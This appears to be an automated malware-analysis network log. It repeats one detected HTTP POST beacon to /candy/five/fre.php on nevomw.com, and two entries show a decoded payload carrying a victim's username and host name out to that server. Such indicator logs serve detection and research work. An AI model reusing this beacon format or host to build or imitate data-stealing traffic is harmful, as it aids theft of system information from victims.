                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
